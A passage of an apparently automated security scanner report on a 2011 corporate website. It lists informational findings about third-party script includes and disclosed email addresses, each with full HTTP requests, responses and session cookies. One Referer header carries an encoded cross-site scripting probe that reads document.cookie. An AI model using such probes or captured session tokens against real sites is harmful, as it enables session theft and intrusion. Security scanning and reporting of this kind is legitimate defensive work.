Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:15:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:37:40 GMT;path=/
Content-Length: 50747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.24. http://www2.starcite.com/starcite/resource/findresources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resource/findresources

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/resource/findresources HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:59 GMT;path=/
Content-Length: 29216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.25. http://www2.starcite.com/starcite/resourcecenter/downloads/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/resourcecenter/downloads/a HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:50 GMT;path=/
Content-Length: 36918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="93" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.26. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:20 GMT;path=/
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="93" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.27. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:20 GMT;path=/
Content-Length: 39463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="93" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.28. http://www2.starcite.com/starcite/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/sitemap

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/sitemap HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:17 GMT;path=/
Content-Length: 16966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.29. http://www2.starcite.com/starcite/solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/solutions HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=17
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:31 GMT;path=/
Content-Length: 13948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.30. http://www2.starcite.com/starcite/suppliers/howitworks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/suppliers/howitworks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/suppliers/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:12 GMT;path=/
Content-Length: 25233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.31. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerseventview.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/themes/garland/views-list-plannerseventview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.32. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerswhitepaperview.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/themes/garland/views-list-plannerswhitepaperview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.33. http://www2.starcite.com/starcite/whatwedo/ourtechnology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/ourtechnology

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/whatwedo/ourtechnology HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:50 GMT;path=/
Content-Length: 23419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.34. http://www2.starcite.com/starcite/whatwedo/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/overview

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/whatwedo/overview HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:21:56 GMT;path=/
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.35. http://www2.starcite.com/starcite/whatwedo/starcitenetwork  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/starcitenetwork

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/whatwedo/starcitenetwork HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:51 GMT;path=/
Content-Length: 21350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

5. Email addresses disclosed  previous  next
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://www2.starcite.com/starcite/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/ HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; expires=Tue, 25 Jan 2011 17:30:23 GMT; path=/; domain=.www2.starcite.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:30 GMT;path=/
Content-Length: 39548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
<a href="mailto:srosenlund@starcite.com">
...[SNIP]...

5.2. http://www2.starcite.com/starcite/customerlogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customerlogin

Issue detail

The following email addresses were disclosed in the response:

Request

GET /starcite/customerlogin HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
